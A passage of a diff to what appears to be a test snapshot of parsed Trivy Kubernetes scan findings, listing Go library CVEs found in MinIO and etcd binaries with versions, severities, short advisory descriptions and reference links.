"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "https://errata.rockylinux.org/RLSA-2022:7129", + "https://github.com/advisories/GHSA-69cg-p879-7622", + "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "https://github.com/golang/go/issues/54658", + "https://go.dev/cl/428735", + "https://go.dev/issue/54658", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-27664.html", + "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "https://pkg.go.dev/vuln/GO-2022-0969", + "https://security.gentoo.org/glsa/202209-26", + "https://security.netapp.com/advisory/ntap-20220923-0004/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-27664", + ], + }, "category": "Vulnerability", - "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "ParseAcceptLanguage takes a long time to parse complex tags", + "name": "handle server errors after sending GOAWAY", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32149", + "value": "https://avd.aquasec.com/nvd/cve-2022-27664", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32149", + "value": "https://access.redhat.com/errata/RHSA-2023:2357", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "value": "https://access.redhat.com/security/cve/CVE-2022-27664", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "value": "https://bugzilla.redhat.com/2107371", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/56152", + "value": "https://bugzilla.redhat.com/2107374", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "value": "https://bugzilla.redhat.com/2107383", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "value": "https://bugzilla.redhat.com/2107386", }, { "type": "URL", - "value": "https://go.dev/cl/442235", + "value": "https://bugzilla.redhat.com/2107388", }, { "type": "URL", - "value": "https://go.dev/issue/56152", + "value": "https://bugzilla.redhat.com/2113814", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "value": "https://bugzilla.redhat.com/2124669", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "value": "https://bugzilla.redhat.com/2132868", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "value": "https://bugzilla.redhat.com/2132872", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1059", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + }, + { + "type": "URL", + "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + }, + { + "type": "URL", + "value": "https://errata.rockylinux.org/RLSA-2022:7129", + }, + { + "type": "URL", + "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + }, + { + "type": "URL", + "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + }, + { + "type": "URL", + "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + }, + { + "type": "URL", + "value": "https://github.com/golang/go/issues/54658", + }, + { + "type": "URL", + "value": "https://go.dev/cl/428735", + }, + { + "type": "URL", + "value": "https://go.dev/issue/54658", + }, + { + "type": "URL", + "value": "https://groups.google.com/g/golang-announce", + }, + { + "type": "URL", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + }, + { + "type": "URL", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2022-0969", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202209-26", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6038-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20220314234659-1baeb1ce4c0b", - "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27191", - "installedVersion": "v0.0.0-20220131195533-30dcbda58838", - "packageName": "golang.org/x/crypto", + "fixedVersion": "0.1.1-0.20221104162952-702349b0e862", + "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41721", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8008", - "https://access.redhat.com/security/cve/CVE-2022-27191", - "https://bugzilla.redhat.com/1939485", - "https://bugzilla.redhat.com/1989564", - "https://bugzilla.redhat.com/1989570", - "https://bugzilla.redhat.com/1989575", - "https://bugzilla.redhat.com/2064702", - "https://bugzilla.redhat.com/2121445", - "https://bugzilla.redhat.com/2121453", - "https://errata.almalinux.org/9/ALSA-2022-8008.html", - "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", - "https://go.dev/cl/392355", - "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", - "https://linux.oracle.com/cve/CVE-2022-27191.html", - "https://linux.oracle.com/errata/ELSA-2022-8008.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", - "https://pkg.go.dev/vuln/GO-2021-0356", - "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", - "https://security.netapp.com/advisory/ntap-20220429-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-27191", + "https://access.redhat.com/security/cve/CVE-2022-41721", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41721", + "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", + "https://go.dev/cl/447396", + "https://go.dev/issue/56352", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", + "https://pkg.go.dev/vuln/GO-2023-1495", + "https://www.cve.org/CVERecord?id=CVE-2022-41721", ], }, "category": "Vulnerability", - "description": "The golang.org/x/crypto/ssh package before 0.0.0-20220314234659-1baeb1ce4c0b for Go allows an attacker to crash a server in certain circumstances involving AddHostKey.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "crash in a golang.org/x/crypto/ssh server", + "name": "request smuggling", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27191", + "value": "https://avd.aquasec.com/nvd/cve-2022-41721", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8008", + "value": "https://access.redhat.com/security/cve/CVE-2022-41721", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27191", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41721", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1939485", + "value": "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989564", + "value": "https://go.dev/cl/447396", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989570", + "value": "https://go.dev/issue/56352", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989575", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2064702", + "value": "https://pkg.go.dev/vuln/GO-2023-1495", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2121445", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41721", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.7.0", + "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41723", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", + "packageName": "golang.org/x/net", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-41723", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", + "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "https://go.dev/cl/468135", + "https://go.dev/cl/468295", + "https://go.dev/issue/57855", + "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "https://pkg.go.dev/vuln/GO-2023-1571", + "https://vuln.go.dev/ID/GO-2023-1571.json", + "https://www.cve.org/CVERecord?id=CVE-2022-41723", + ], + }, + "category": "Vulnerability", + "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "avoid quadratic complexity in HPACK decoding", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2121453", + "value": "https://avd.aquasec.com/nvd/cve-2022-41723", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8008.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-41723", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", }, { "type": "URL", - "value": "https://go.dev/cl/392355", + "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", }, { "type": "URL", - "value": "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", + "value": "https://go.dev/cl/468135", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://go.dev/cl/468295", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", + "value": "https://go.dev/issue/57855", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", + "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27191.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8008.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "value": "https://pkg.go.dev/vuln/GO-2023-1571", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", + "value": "https://vuln.go.dev/ID/GO-2023-1571.json", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", + }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.4.0", + "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41717", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", + "packageName": "golang.org/x/net", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2367", + "https://access.redhat.com/security/cve/CVE-2022-41717", + "https://bugzilla.redhat.com/2092793", + "https://bugzilla.redhat.com/2161274", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "https://go.dev/cl/455635", + "https://go.dev/cl/455717", + "https://go.dev/issue/56350", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-41717.html", + "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "https://pkg.go.dev/vuln/GO-2022-1144", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-41717", + ], + }, + "category": "Vulnerability", + "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "excessive memory growth in a Go server accepting HTTP/2 requests", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-41717", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", + "value": "https://access.redhat.com/errata/RHSA-2023:2367", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://access.redhat.com/security/cve/CVE-2022-41717", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + "value": "https://bugzilla.redhat.com/2092793", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0356", + "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", }, { "type": "URL", - "value": "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220429-0002/", + "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27191", + "value": "https://go.dev/cl/455635", + }, + { + "type": "URL", + "value": "https://go.dev/cl/455717", + }, + { + "type": "URL", + "value": "https://go.dev/issue/56350", + }, + { + "type": "URL", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + }, + { + "type": "URL", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2022-1144", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6038-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", + }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "0.3.8", + "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-32149", + "installedVersion": "v0.3.7", + "packageName": "golang.org/x/text", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-32149", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "https://github.com/golang/go/issues/56152", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "https://go.dev/cl/442235", + "https://go.dev/issue/56152", + "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "https://pkg.go.dev/vuln/GO-2022-1059", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2022-32149", + ], + }, + "category": "Vulnerability", + "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "ParseAcceptLanguage takes a long time to parse complex tags", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-32149", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2022-32149", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + }, + { + "type": "URL", + "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + }, + { + "type": "URL", + "value": "https://github.com/golang/go/issues/56152", + }, + { + "type": "URL", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + }, + { + "type": "URL", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + }, + { + "type": "URL", + "value": "https://go.dev/cl/442235", + }, + { + "type": "URL", + "value": "https://go.dev/issue/56152", + }, + { + "type": "URL", + "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + }, + { + "type": "URL", + "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2022-1059", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5873-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20211209124913-491a49abca63", - "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-44716", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-2835", + "installedVersion": "v1.9.3", + "packageName": "github.com/coredns/coredns", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-44716", - "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", - "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", - "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", - "https://github.com/golang/go/issues/50058", - "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", - "https://go.dev/cl/369794", - "https://go.dev/issue/50058", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", - "https://linux.oracle.com/cve/CVE-2021-44716.html", - "https://linux.oracle.com/errata/ELSA-2022-0001.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", - "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", - "https://pkg.go.dev/vuln/GO-2022-0288", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220121-0002/", - "https://www.cve.org/CVERecord?id=CVE-2021-44716", + "https://access.redhat.com/security/cve/CVE-2022-2835", + "https://bugzilla.redhat.com/show_bug.cgi?id=2118542", + "https://github.com/advisories/GHSA-ch7v-37xg-75ph", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2835", + "https://www.cve.org/CVERecord?id=CVE-2022-2835", ], }, "category": "Vulnerability", - "description": "net/http in Go before 1.16.12 and 1.17.x before 1.17.5 allows uncontrolled memory consumption in the header canonicalization cache via HTTP/2 requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "A flaw was found in coreDNS. This flaw allows a malicious user to reroute internal calls to some internal services that were accessed by the FQDN in a format of ..svc.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "golang: net/http: limit growth of header canonicalization cache", + "name": "coreDNS: DNS Redirection of Internal Services", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-44716", + "value": "https://avd.aquasec.com/nvd/cve-2022-2835", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-44716", + "value": "https://access.redhat.com/security/cve/CVE-2022-2835", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118542", }, { "type": "URL", - "value": 